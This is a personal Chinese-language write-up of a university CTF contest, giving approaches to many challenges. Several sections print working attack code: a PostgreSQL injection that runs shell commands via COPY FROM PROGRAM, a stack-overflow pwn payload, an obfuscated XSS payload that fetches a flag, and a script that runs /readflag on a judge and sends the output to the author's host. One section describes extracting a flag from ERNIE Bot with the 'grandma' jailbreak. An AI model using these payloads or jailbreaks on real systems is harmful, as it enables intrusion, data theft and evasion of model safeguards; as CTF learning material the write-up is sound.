🚩 第二届 NEX CTF 赛后总结 + 个人思路

学院举办了一场 CTF 比赛用来拷打 xdx，经过两天的战斗，我拿到了大部分的 flag。和去年的 Hackergame 一样，这次又学到了很多东西。本文来写一些会做的题的思路，并简单做一下复盘。

6624 分，7/155。

🗨️ 样题

样题是在比赛前两天放出的，主要是工具教学。

🚩 选择题
一眼钓鱼。

👀 隐秘的 Flag
把图片拉进 PS，拉低亮度，拉高对比度，即可在左上角看见 flag。

🔑 简单的加密
凯撒密码，穷举得出偏移量为 10。

🐱 你的第一次 nc 连接
点击即送 flag。

🔑 逆向测试
给出了 test.exe 的源码 test.c，直接改掉条件判断即可。

👊 一分钟下架
经典签到题形式，前面几个商品的路径都为 /product/ 开头，更改 url 访问 /product/7 即可获得 flag。

🖊️ 理论赛

理论赛都是选择题，有一道题连续交错了两次，错失满分。

连选了两次错误答案 C 和 B，但其实答案是 D。

🚩 实践赛

🚩 ✅ 签到喵

海报的底部是一段摩斯电码，抄下来解码后即可得出 flag。

📦 ✅ Flag Installer

这道题很像之前流行的 Steam 游戏「流氓软件」，在安装过程中绕过所有的坑即可拿到 flag 1。

防不胜防

在安装路径可以找到一个 flag.mdb 文件，由于我电脑上没有 Access（都 4202 年了 🤔），于是直接用 Detect It Easy 提取字符串，即可拿到 flag 2。

💫 ✅ 从零开始的 CPP 生活

题目是一段 cpp 源码，注释了打印 flag 的行。编译运行即可拿到 flag。

⏰ ✅ 时光机器 (Time Machine)

题目用 v86 在浏览器里运行了一个 Windows 3.1 的模拟器，需要先用 win /s 命令进入图形环境，之后 在 Program Manager 中双击 Games，找到 Minesweeper (扫雷) 然后打开……

玩扫雷玩的

把 C:\FLAG.BMQ 改名为 FLAG.BMP，打开即送 flag。

不得不说 v86 真是一款非常经典的软件啊。2022 年好像就在哪里见过来着，但是记不清了。

🕰️ ✅ 时间悖论 (Time Paradox)

虽然在模拟器里无法打开 docx 文件，但是可以直接把模拟器的镜像文件下载下来，使用 qemu-nbd 和 mount 挂载即送 flag。

此处的 flag 是在 docx 里插入的图片，使用的是 Arial 字体而不是流行的编程等宽字体，所以可能有分不清 iIlLj0Oo 的问题，多试几次即可。

🧑‍💼 ✅ 打工人打工魂

📊 ✅ 高数课 我挚爱的时光~

和先锋网络中心面前题的附加题很类似，是在 ppt 里找 flag 的碎片。理论上这道题是解压就送的，但我还是尝试做了一下。

Office Open XML 格式本质上是 zip 压缩包，解压对于 Office Open XML 格式真是通杀神器，除了 OLE 对象文件外基本都可以秒杀。

📘 ✅ 芙芙的解谜之旅

解压后在 [Content_Types].xml 里即可找到被 base64 编码后的隐藏的 Flag。

我就说正常的 Office XML 怎么会有注释嘛

🔏 ✅ 凯撒超进化

题干给出了提示 Vigenère cipher（即使不给应该也能猜个大概）。

密文为 bdr{jka3bdlS_k5_50_Y45M_guvZboguV4}，密钥为三位，查密码表得出密码 ozu，解码即得 flag。

这个密码对我来说也是熟人了，先锋的 ppt 题里就出现了这个密码。

🔍 ⭕ 忙忙碌碌寻宝藏~

📸 ✅ 隐秘的角落

题目给出了一张照片，需要找到照片是在哪栋楼的哪层拍摄的。看到题目给出的照片，我本以为是南湖校区的综合实验楼二期，但实地考察后发现不是。
浑南这边有三角形镂空的建筑只有一食堂和建筑学馆 B 座，穷举得出答案。

题目

实地考察

🗺️ ❌ 地图科技

我没用过 OpenStreetMap，因为这东西在国内没有测绘许可证，所以地图年久失修，基本处于不可用的状态。因此，先让 GPT 生成查询语句的底子：

1
2
3
4

[out:json];
area["boundary"="ceremonial"]["name"="Greater London"]->.searchArea;
node["power"="generator"]["generator:source"="wind"](area.searchArea);
out;

感觉 … 不如 SQL 人性化。

经过一阵研究后发现，搜索 "generator:source"="wind" 和 "generator:method"="wind_turbine" 得到的结果数量不同，分别是 54 个和 45 个，但我分别尝试均以失败告终。

🙉 ✅ 世界计算能力下降一万倍

紧跟时事。

题目是 100 以内的十道加减法，需要速度超过每题 0.00 秒的挂哥。题目获取、结果上传和排名获取全是在前端处理的，众所周知，前端无秘密。F12 查看网络请求，编辑并重发，之后传一个负数成绩上去即可超过挂哥，拿到 flag。

就是前端的那个手写数字识别模型让人血压很高，识别率奇低无比 …

🐒 ✅ 黑神话 ● 迷宫

是走迷宫题，需要用 nc 连接到题目走迷宫。第一问没有时间限制，走过就是赢，而第二问需要在一秒钟（？）之内完成，显然是人达不成的速度，需要使用脚本。

根据 GPT 的说法，可以用深度优先搜索求出走过迷宫的最短路径。由于我缺乏相关的算法知识，算法部分只能让 GPT 完成了。

连接到题目服务器，拿到迷宫后，使用算法求出路径，并且以极快的速度发送即可拿到 flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60

import socket as socks
from collections import deque
import time

sock=socks.socket(socks.AF_INET,socks.SOCK_STREAM)
sock.connect(('IP:IP:IP:IP', PORT))

maze = []
_maze = sock.recv(1024).decode()
for line in _maze.split('\n')[:9]:
    line = list(line.replace('s', '.').replace('e', '.').replace('p', '.').replace(' ', '.'))
    maze.append(line)

for line in maze:
    print(line)

# Generated by ChatGPT

directions = [(-1, 0, 'w'), (1, 0, 's'), (0, -1,'a'), (0, 1,'d')]

def is_valid(x, y, maze, visited):
    # 检查坐标是否在迷宫范围内且是通路并且未被访问过
    return 0 <= x < len(maze) and 0 <= y < len(maze[0]) and maze[x][y] == '.' and not visited[x][y]

def find_path(maze):
    rows, cols = len(maze), len(maze[0])
    visited = [[False for _ in range(cols)] for _ in range(rows)]
    queue = deque([((0, 0), [])])  # ((当前坐标), [到达该坐标的方向])
    visited[0][0] = True

    while queue:
        (x, y), path = queue.popleft()
        
        # 检查是否到达终点
        if (x, y) == (rows - 1, cols - 1):
            return path
    
        # 遍历四个方向
        for dx, dy, direction in directions:
            new_x, new_y = x + dx, y + dy
            if is_valid(new_x, new_y, maze, visited):
                visited[new_x][new_y] = True
                queue.append(((new_x, new_y), path + [direction]))
    
    return None

path = find_path(maze) 

print(list(path))

for step in path:
    if step:
        sock.send(step.encode())
        sock.send(b'\n')
        print(sock.recv(1024).decode())

print(sock.recv(1024).decode())

sock.close()

🎼 ✅ 迷失于梦境的光

从例题就已经能看出来 Common 的出题人是个源批了，这道题同样也是英国源神的插画。

提示给出了「隐写术」，但并未提供密码。正当我打开 HEX 编辑器准备找密码时，却意外在 jpg 文件尾之后发现了明文的 flag。根本不是隐写术啊 …

1
2
3
4
5
6

/tmp/ ➜ hexyl 75b63e81fc3090116b862536e2cdf9f4.jpg | tail -5
│00024080│ 1d 63 6f ca a4 5b 79 32 ┊ 3f 76 d8 fa 53 03 ff d9 │•co××[y2┊?v××S•××│
│00024090│ 6e 65 78 7b 63 34 30 66 ┊ 31 63 37 63 2d 31 66 62 │nex{c40f┊1c7c-1fb│
│000240a0│ 32 2d 34 65 63 33 2d 38 ┊ 38 61 36 2d 39 65 66 37 │2-4ec3-8┊8a6-9ef7│
│000240b0│ 66 65 65 35 31 64 63 61 ┊ 7d                      │fee51dca┊}       │
└────────┴─────────────────────────┴─────────────────────────┴────────┴────────┘

🐲 ✅ 来自远古小恐龙的挑战书

题目是经典 Chrome 小恐龙游戏，需要打到 99999 分才能拿到 flag。flag 被异或密码加密后写在了 js 里，通过前端解密。不需要用调试器试图改分数，只需要把相关代码拷出来单独运行，即可拿到 flag。

如果实在是闲得蛋疼，可以用 AI 模型来自动打到 99999 分，不过打到那一刻的时候，比赛也应该就结束了吧 …

😶‍🌫️ ✅ 开源逆向题喵

这道题是一个用 ImGui 编写的 Windows 程序，flag 被三个遮挡物挡住，其中两个可以拖动，一个则会在鼠标点击后关闭电脑。

这是我第一次做逆向题，现场恶补汇编语言。题目难度不大，因为给出了程序源代码。用 IDA 把创建遮挡物相关的语句改成 NOP 即可让遮挡物不出现，抄下 flag 即可。

你可能想问，既然有源代码，为什么我不编译？其实是因为我电脑上没有 VS …

🧬 ✅ 破解 DNA 之密

不清楚算不算密码题。题目给出的 DNA 序列中，A G C T 四个碱基分别代表四进制的四个数字。暴力穷举即可得出 flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14

dna='CATA CACC CTAG CTAT CACG CGTA CGGC CCTT CGAA CCCC CCGT GTCT CCTT GTCC CATT CCTT CCGT CGTT CAGC CAAT CACG CATA CCCT GTCG CGAA CGCG CCCT CACG GTCG CCCT CACG CTCT CAGC GTGC CACG CTCT GTCG CGTT CGAA CGCG CTTC'.replace(' ','')

for A in range(4):
    for T in range(4):
        for G in range(4):
            for C in range(4):
                dna_dec=dna.replace('A', str(A)).replace('T',str(T)).replace('G',str(G)).replace('C',str(C))
                dna_int=int(dna_dec,base=4)
                if dna_int>0:
                    dna_hex=hex(dna_int)
                    try:
                        print(bytes.fromhex(dna_hex[2:]))
                    except Exception:
                        pass

1
2

python dna.py | grep "nex"
b'nex{dNA_JUS7_5o_SOakdnW4JDWd4Wdwa1dw4OJD}'

🕸️ ✅ 校内 IP 集邮

🤨 ✅ 你听说过 IP 地址吗？

答案为「东北大学 IP 地址归属查询」网站的域名。上网搜索即可找到答案 ip.neu.edu.cn。

🤔 ✅ 收集你的第一个 IP 地址！

这道题的后两个 flag 需要用一定数量的校园网 IP 访问指定网址。

第二个 flag 只需要 4 个 IP，我用了电脑 + 手机 + 软路由 + 平板，四台设备凑齐了四个 IP。

🤯 ✅ 通往 IP 真神的道路……

第三个 flag 需要 25 个 IP，而校园网断线重连并不会下发新的 IP，用 dhclient 也不行，只能等 20 分钟无流量自动下线。

一开始我的思路是用网桥 / macvlan，但校园网最多只允许 5 台设备同时在线，这样做的可行性还不是很高。
直到我发现，通过 OpenVPN 接入校园网每次的 IP 都不一样。即使这样，到后面还是很难刷出没收集过的 IP，在刷了一个半小时 OpenVPN 后，终于凑齐 25 个 IP。

这道题没有通过截图，因为过的时候没截图，而我不想再刷一遍了 … 当时刷够 25 个 IP 之后整个人都是麻的。

这道题是我花费时间最长的一道题。这 OpenVPN 连接是真的慢 …

另外，GitHub 上存在一个可以用 WebVPN 访问任意 URL 的项目，使用后也可以多收集一个 IP（甚至还是免费段的），但 WebVPN 也只有一个 IP，不像 OpenVPN 一样每次都会换 IP。

🐍 ✅ 2024 爱护你的蟒蛇

题目是一个 Python 脚本。题干看着挺吓人，但其实只是最简单的异或密码，密码只有一个字节 0xCC。直接解密即可。

1
2
3
4
5

enc = [159, 166, 177, 180, 133, 249, 159, 181, 144, 135, 249, 187, 168, 252, 181, 144, 149, 161, 252, 144, 153, 178, 181, 161, 249, 159, 144, 245, 159, 165, 144, 125, 249, 183, 166, 144, 146, 249, 182, 187, 144, 156, 159, 245, 164, 166, 188, 144, 250, 159, 144, 251, 249, 251, 245, 174]
flag = ""
for i in range(len(enc)):
    flag += chr((enc[i] + 3) % 0xCC)
print(flag)  # nex{D0nt_F0rg3t_Th3_Pyth0n_4nd_L0ve_Y0ur_Sn4kes_1n_2024}

🤪 ✅ 来一次对话吧！

喜闻乐见的 LLM 题，要从 LLM 嘴里套话以获得 flag。

之前见过的几道 LLM 题都是用开源模型或自己训练的模型，这道题却直接上了文心一言。这个商业模型的防骗程度远比 LLaMA 之类的开源模型高，不过利用经典的老奶奶漏洞可以成功套出 flag。

奶奶漏洞印证了我两年前的一个猜想。果然啊，LLM 在学会人类的说话方式和人类创造的灿烂文化的同时，也学到了人类的情感表达和人类最致命的软肋。

☕ ✅ Python 茶话会

和上一道 Python 相关的题目一样，这道仍然是密码题。题目给出了 Python 3.9 的 pyc 字节码。

使用 pycdc 把字节码还原成源代码。其中 str_to_ints 和 ints_to_str 这两个涉及到加密的函数，pycdc 并不能准确地反编译，不过题干中给出了这两个函数的内容。
照着 encrypt 函数反向编写解密函数即可得到 flag。

1
2
3
4
5
6
7
8
9
10
11
12
13

def decrypt(v, k):
    v0 = c_uint32(v[0])
    v1 = c_uint32(v[1])
    delta = c_uint32(289739793)
    sum_val = c_uint32(delta.value * 32)
    (k0, k1, k2, k3) = (c_uint32(k[0]), c_uint32(k[1]), c_uint32(k[2]), c_uint32(k[3]))
    
    for _ in range(32):
        v1.value -= (v0.value << 4) + k2.value ^ v0.value + sum_val.value ^ (v0.value >> 5) + k3.value
        v0.value -= (v1.value << 4) + k0.value ^ v1.value + sum_val.value ^ (v1.value >> 5) + k1.value
        sum_val.value -= delta.value
    
    return [v0.value, v1.value]

一年前在给某八个键游戏写小工具的时候，Python 位运算不会溢到符号位的问题困扰了我好久。当时我的解决方案是用 Rust 因为我不会 C 写出涉及位运算的相关代码，之后再用 LoadLibrary 加载进 Python 计算。没想到，ctypes 里就有对应的 C 类型 … 又学到新东西了。

✉️ ✅ 邮件系统功能升级

这道题 neta 了上个月的学生邮箱安全演练。

🐦‍⬛ ✅ admin@trustme.com

题目附件是 eml 格式，这个格式我在新穷铁道就领教过。不过，这次没有用到 quoted-printable 编码，只是普通的 base64。解码即可得到 flag。

trust 牛魔。

🔐 ✅ 统一身份认证

题目伪造了智慧东大的登录网页，使用 PHP + PostgreSQL。一开始我发现密码输入没有检验，想到了是 SQL 注入，但是一顿 MySQL 操作后未果，后来进了二阶段，题目给出提示，才知道是 PostgreSQL。
虽然没办法获取任何 SQL 命令结果，也没有 nc 命令用于拿到 Shell，但网页会在错误时直接弹出 PostgreSQL 的报错信息。

拼凑几段报错信息后可以拼出原始的 SQL 查询语句 INSERT INTO record (username, passsword, time) VALUES ('学号', '密码', NOW());。通过询问 GPT 得知，可以用 COPY ... FROM PROGRAM 在 SQL 语句中运行命令，之后用 RAISE 语句在报错信息中显示查询结果。

于是，在密码框中一顿操作拿到 flag。

1
2
3
4
5
6
7
8
9
10
11
12
13

1', NOW()); create table cmd(output text, id serial); insert into record (username, password, time) values ('20240721','1

1', NOW()); copy cmd(output) from program 'cat /flag | base64'; insert into record (username, password, time) values ('20240721','1

1', NOW());
DO $$
DECLARE result TEXT;
BEGIN
    select output into result from cmd order by id desc limit 1;
    RAISE EXCEPTION 'Flag Leaking: %', result;
END;
$$ LANGUAGE plpgsql;
insert into record (username, password, time) values ('20240721','1

🔨 ⭕ 真正的逆向

🎭 ✅ 假面之下的 Flag

直接 Detect It Easy 起手，在字符串中找到明文 flag。

孩子，不要破坏 Ave Mujica 的世界观。

🪞 ✅ 条件判断

扣 1, 送 flag。
扣 1, 送 flag。

题目程序带了调试符号，用 IDA 打开程序，F5 查看伪代码即可拿到条件，输入即可。

🟡 ❌ 答案自动获取器

题目程序改自 Direct2DCircle，说是点击屏幕上的圈圈就可以拿到 flag，但鼠标移到圈圈上，它就会移到屏幕上的随机位置。

但是，我都把屏幕分辨率改成 200*200 了，你都退无可退了，怎么我点你了，还是不给我 flag 呀？

在字符串列表中有经典的随机函数 SystemFunction036（RtlGenRandom），但 VS（Windows SDK?）把所有的函数调用包了一层又一层，exe 的大小也高达 3.3MB，无论是汇编还是伪代码，基本都完全不可读。

这道题的解法应该类似 Flag 自动机，不过在写这篇文章时官方 wp 还没公布，坐等。

😾 ❌ 愤怒喵 NaN~

代码被拆分成了 322 个 so 文件，过于神经，不想做了。

题目文件名为 mustAngr.zip，但是我不会用 Angr…

🚪 ⭕ 敲开 UDP 之门

UDP 真是我又爱又恨的一种协议。

👀 ✅ 初识 UDP

用 nc -u 连接到题目并输入 Yes，点击即送 flag。

1
2
3
4
5
6

$ nc -u IP:IP:IP:IP PORT

Welcome to the UDP server.
Are you really sure to get your flag? [Yes/No] Yes
Thank you for your corporation!
A gift for you: nex{H0W_is_y0uR_FIrSt_ImPre5SIOn_with_UDP?_70494oup}

🔌 ✅ 列出你的端口清单

用 nc 在自己电脑上监听，之后在题目网页中发送任意消息，即可收到 flag。

1

nc -lnvup 11451

❌ 通往 NAT 的阶梯

看到题干，我的第一反应是 UDP 打洞，但经过查询发现，UDP 打洞只能在圆锥型 NAT 环境使用，但题目给出的是对称型 NAT，遂放弃。

之前 Tailscale，upnpc 之类的东西用得挺舒服的，联机游戏玩得挺爽的，但是这方面的底层原理， 我还是一点也不懂啊 … 并且这东西看起来不像是一两天就能搞定的，慢慢学吧。

🌐 ✅ It’s all about HTTP

跨越长城，走向世界！

这道题需要使用五个不同的 HTTP 版本向题目发送请求，解法如下：

• HTTP/0.9: echo 'GET /' | nc IP PORT
• HTTP/1.0: curl --http1.0 http://IP:PORT
• HTTP/1.1: 浏览器访问即可
• HTTP/2.0: curl --http2 -k https://IP:PORT
• HTTP/3.0: curl3 --http3-only -k https://IP:PORT

HTTP/0.9 … 去年在做 HTTP 集邮册的时候，无意间认识到了这个东西，没想到它在一年后还在追我。

HTTP/3 … 国内运营商对 UDP 的态度都是天天丢包，爱搭不理，所以在我自己的上网配置上，直接阻止了所有 HTTP/3 的请求。我还特地找了另外一台机子做的这一问。

🤯 ⭕ Pwn~ 应声倒下

没有 pwn 基础，因此只是现学现卖地做出了第一个 flag。

✍️ ✅ N 个人各自有着自己的秘密

堆栈平衡。在比赛第二天晚上，给出了一篇博文作为提示，但在当天上午我就已经搜到了它，并且照着拿到了 flag。

1
2
3
4
5
6
7

from pwn import *
import time
p=remote("IP", PORT)
payload = b"a" * (0x40+8)+ p64(0x40117A) + p64(0x401156)
print(p.recvline())
p.send(payload)
p.interactive()

📚 ❌ 魔法禁书目录

格式化字符串攻击。文档中使用的是 gef 工具，但 ctf-wiki 是 Python 2 时代编写的，严重过时，不仅现在的题目由 32 位变成了 64 位，gef 的界面也早已变化，我根本找不到格式化字符串是 printf 的第几个参数，穷举失败后作罢。

💸 ❌ 寻￥环游记

pwn 困难 … 直接放弃（逃）

🐍 ⭕ Online Judge

A ✌️，带我走吧 😭😭😭😭😭😭😭

🤏 ✅ Uncontrollable

题目搭建了一个 Python OJ 环境，评测环境没做任何隔离，直接用极为危险的 eval 运行待评测的代码，并且会给出程序输出，直接打印即可。

1
2

with open("/flag", "r") as f:
    print(f.read())

🤔 ✅ Desirable

第二个 flag 不会打印输出，但评测机环境依然没有隔离，直接通过网络传回 flag。

1
2
3
4
5
6
7
8
9
10
11
12

import socket
import os
import subprocess

# /flag 测评机没有权限读取，但具有 SUID 的 /readflag 程序可以读取
result = subprocess.run(['/readflag'], capture_output=True, text=True)
output = result.stdout

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('MY_IP', 11451))
client_socket.send(str(result).encode('utf-8') + b'\n')
client_socket.close()

1
2
3
4
5
6
7
8
9
10
11
12
13

import socket

# 在自己电脑上守株待兔即可
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(('0.0.0.0', 11451))
server_socket.listen(1)

while True:
    client_socket, addr = server_socket.accept()
    data = client_socket.recv(1024)
    if data:
        print(f"Flag leaked: {data.decode('utf-8')}")
    client_socket.close()

🏃 ❌ Escapable

题目直接把 builtins 换掉了，所以必须进行沙箱逃逸。

起初倒是想搞一搞，但是题目环境拿不到任何输出，如果对着题目环境只能盲操作，而我电脑上又没装 Docker，所以直接放弃。

🔢 ❌ 独自一人的数论攻略

试图用 z3 求解，跑了半个小时后爆内存了，遂放弃。

2024 年高三九省联考的压轴题考查了数论中的费马小定理，当时的高考风向导致了很多和我同届的优等生都去学数论，而我没有跟着他们卷，所以数论部分我根本比不过那些 xdx。

🐘 ❌ Don’t Touch My Code!

题目给出了一段 php 程序，提示如下：

程序的逻辑是先读入源码，匹配所有的空格和 Tab，并将奇数个空格当作 0，偶数个当作 1 组成一段二进制序列，之后把它转换成十六进制，再转换成 ASCII 字符，并且把结果丢进 eval 运行。

按照题目的代码，eval 后输出了一行 Hello, World!，但我找了半天都没找到如何往程序中输入内容，只能一遍又一遍地刷新，一遍又一遍地看着程序重复既定的逻辑，并不知道如何进行输入，或是改动服务器上这个 php 文件的内容。

题目的难度是中等，但实际做起来感觉是困难。根本找不到输入 payload 的地方 …

🥒 ❌ Generative WebConsole

客服小祥在线为您服务。

题目给出了一个 Web 终端，每次进入终端都会从 9999 个 Linux 环境中随机分配一个。flag 在 /secret 文件下，理论上除了 root 任何人都读不到 flag。

我一开始的思路是 SUID 提权和 dirty cow 漏洞，在试了几百个环境之后，没有一个环境可以 SUID 提权，也没有一个环境内核版本旧到可以漏洞提权，遂放弃。

🐍 ✅ 智慧学园的召集令

第三道 Python 题。题目程序使用了 PyInstaller 打包，使用脚本即可解出 pyc 字节码，之后用 pycdc 可反编译获得部分源码。虽然反编译得到的源码不能直接运行，但可以作为参考。

题目需要输入九个选项（A B C D E）以转换成 ASCII 码，并输入一个整数，得到十个变量，如果这些数是某个线性方程组的解，那么选项字符串的 MD5 即为 flag。

Two thousand years later，手算了一个行列式之后，看到题目中的提示 约束求解，遂经过搜索后，用 z3 解出本题。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

# Generated by ChatGPT

from z3 import *

# 定义变量
a = [Int(f'a{i}') for i in range(9)]
l = Int('l')

# 定义变量的取值范围 (字符范围是65到69)
constraints = [And(a[i] >= 65, a[i] <= 69) for i in range(9)]
constraints.append(l >= 0)

# 添加题目中的约束条件
constraints.append((a[1] * 33 + a[2] + a[3] * 255 + a[4] * 5 - a[5] * 44) + a[6] * 23 + a[7] + a[8] - a[0] == 18086)
constraints.append(a[1] * 123121 + a[2] * 456 + l * 4421 + a[4] * 789 + a[6] * 111 + l * 222 == 10718690)
constraints.append(a[3] * 114514 + a[5] * 1919810 + l * 233 + a[7] * 23333 + a[0] * 66666 == 142285032)
constraints.append(a[1] * 2 + a[2] * 223 + l * 4 + a[4] * 2123 + a[6] * 212 + l * 22 - a[8] == 179865)
constraints.append((a[1] * 3 + a[2] * 3 + a[0] * 3 + l * 3 - a[8] * 3) + a[7] * 2 == 1996)
constraints.append(((((a[1] - a[2]) + a[3] - a[4]) + a[5] + a[6] * 89 + a[7] - a[8]) + a[0] * 89 - l) * 22 == 247258)
constraints.append(((a[1] + 90 * a[2] - a[3]) + a[4] * a[5] * a[6] + a[7] + a[8] + 90 * a[0]) * 245 + l * 2 == 72365152)
constraints.append((a[1] + a[5] + a[6] + a[7] + a[8] + a[0]) * 35 + l * 3 == 15563)
constraints.append(a[1] * a[2] * a[3] * a[4] * a[5] * a[6] * a[7] * a[8] * a[0] * 4 + l == 0x181C4785E36ACE6)
constraints.append(((a[1] + a[2] * 345 - a[3]) + a[4] * 24 + a[5] * 856 - a[6] - a[7]) + a[8] * 1212 + a[0] + l * 33 == 182318)

# 创建求解器
solver = Solver()
solver.add(constraints)

# 检查是否有解，并打印结果
if solver.check() == sat:
    model = solver.model()
    solution = [model[a[i]].as_long() for i in range(9)]
    l_value = model[l].as_long()
    print("Solution:", solution, "l:", l_value)
else:
    print("No solution found")

✂️ ⭕ Your Favorite XSS

只因为我在群里说了一句「为什么没有 XSS」，出题的佬特地给我加了一道题 …

题目的正则表达式可以过滤掉绝大多数可能，但漏掉了不带引号的 event，可以轻松绕过。

1

<p><img src="x" onerror=window[atob('ZXZhbA==')](atob('Base64编码的JS')) /></p>

根据出题人的提示，我编写了如下代码尝试运行：

1
2
3
4
5
6
7
8
9
10
11
12

fetch('/flag', {
    mode: 'no-cors'
}).then(res => res.text()).then(flag => {
    fetch('/post', {
        mode: 'no-cors',
        method: 'POST',
        headers: {
            'content-type': 'application/x-www-form-urlencoded'
        },
        body: 'content=' + btoa(flag)
    })
})

在本地跑的时候可以正常往题目的留言板上发送出一条 Unauthorized!，但 XSS bot 似乎根本不理会这些脚本 … 失败。

🤔 感想

这次是第一次正式参加 CTF 比赛，比起去年，一年后的我又进步了很多。

General 方面已经能基本拿下了，但提权方法之类的仍然需要多掌握，也要提升社工技巧。

去年的 Web 题只差一道 XSS 没做出来，因此一直对 XSS 有种特别的执念。结果，今年仍然没做出来 … 已经在期待微积分计算小练习 3.0 了。另外，Web 题基本都在用 Docker 当作环境，因此在本地配一个 Docker 还是十分重要的。

今年头一次碰 Binary 题和 Pwn 题，掌握了一点点汇编和寄！存器的基本知识，随着之后的专业学习，对计算机的了解更深入，在这条赛道上我应该也会更加进步的吧。

还有 Math … 一直以来都是我的弱点，都说学语言要有「语感」，学数学其实也有「数感」，不过我的「数感」显然是属于比较弱的那一档，因此只能通过努力来弥补「数感」的不足。微积分，概率论，离散数学，数论，图论，博弈论 … 宇宙万法的那个源头是什么呢？数学。我真学了吗，如学（逃）

每年都在不断成长，一年一年累积起来，就是一辈子！